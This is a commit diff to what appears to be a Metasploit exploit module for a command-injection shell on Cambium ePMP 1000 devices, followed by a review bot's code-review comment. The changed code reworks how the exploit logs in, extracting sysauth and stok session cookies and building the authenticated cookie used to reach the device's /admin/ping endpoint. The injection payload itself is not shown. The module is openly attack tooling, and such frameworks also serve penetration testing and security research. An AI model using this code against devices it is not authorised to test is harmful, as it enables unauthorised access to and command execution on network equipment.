
Commit a86abb0

committed
Implemented get_cookies_parsed
1 parent 5dfb5d5 commit a86abb0


1 file changed

+16
-10
lines changed


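--- a/modules/exploits/linux/http/epmp1000_ping_cmd_shell.rb
+++ b/modules/exploits/unix/http/epmp1000_ping_cmd_shell.rb
@@ -103,7 +103,7 @@ def check
 if (success != 'false' && !epmp_ver.nil? && epmp_ver < '2.5')
 return CheckCode::Vulnerable
 else
-return CheckCode::Safe # Using 'Safe' here to imply this ver is not exploitable using the module'
+return CheckCode::Safe # Using 'Safe' here to imply this ver is not exploitable using ~the module~'
 end
 end
 
@@ -128,16 +128,19 @@ def login(user, pass)
 )
 
 cookies = res.get_cookies_parsed
+check_sysauth = cookies.values.select { |v| v.to_s =~ /sysauth_/ }.first.to_s
+
 good_response = (
 res &&
 res.code == 200 &&
-cookies.include?('sysauth')
+check_sysauth.include?('sysauth')
 )
 
 if good_response
-sysauth_value = cookies.match(/((.*)[$ ])/)
+sysauth_dirty = cookies.values.select { |v| v.to_s =~ /sysauth_/ }.first.to_s
+sysauth_value = sysauth_dirty.match(/((.*)[$ ])/)
 
-cookie1 = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D"
+cookie1 = "#{sysauth_value}" + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D"
 
 res = send_request_cgi(
 {
@@ -158,21 +161,24 @@ def login(user, pass)
 )
 
 cookies = res.get_cookies_parsed
+
 good_response = (
 res &&
 res.code == 200 &&
-cookies.include?('stok=') &&
+cookies.has_key?('stok') &&
 !res.body.include?('Maximum number of users reached.')
 )
 
 if good_response
 print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
 
-# get the cookie now
-get_stok = cookies.match(/stok=(.*)/)
-stok_value = get_stok[1]
-sysauth_value = cookies.match(/((.*)[$ ])/)
-final_cookie = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D; userType=Installer; usernameType=installer; stok=" + "#{stok_value}"
+# get the final cookie now
+cookies = res.get_cookies_parsed
+stok_value = cookies.has_key?('stok') && cookies['stok'].first
+sysauth_dirty = cookies.values.select { |v| v.to_s =~ /sysauth_/ }.first.to_s
+sysauth_value = sysauth_dirty.match(/((.*)[$ ])/) # gets sysauth_*
+
+final_cookie = "#{sysauth_value}" + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D; userType=Installer; usernameType=installer; stok=" + "#{stok_value}"
 
 # create config_uri
 config_uri_ping = '/cgi-bin/luci/;stok=' + "#{stok_value}" + '/admin/ping'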
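Review bot: In `login`, `cookies = res.get_cookies_parsed` (new lines 130 and 163) and the added `cookies.values.select …` on line 131 run before the `res &&` test inside `good_response`, so if `send_request_cgi` returns nil (which the `res &&` guard suggests it can) the method raises NoMethodError instead of taking the failure branch. Guard where the response is parsed, e.g. `cookies = res ? res.get_cookies_parsed : {}`, so the later `.values` and `has_key?` calls stay safe. The expression `cookies.values.select { |v| v.to_s =~ /sysauth_/ }.first.to_s` now appears three times (lines 131, 140, 178) and line 176 re-parses a response already parsed on line 163; one small private helper would remove both. Separately, `sysauth_dirty.match(/((.*)[$ ])/)` returns nil when nothing matches, and with the `; ` separator dropped the header would then silently begin at `globalParams=`; note that `[$ ]` is a character class (literal `$` or space), not an end anchor. `login` begins and ends outside these hunks.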
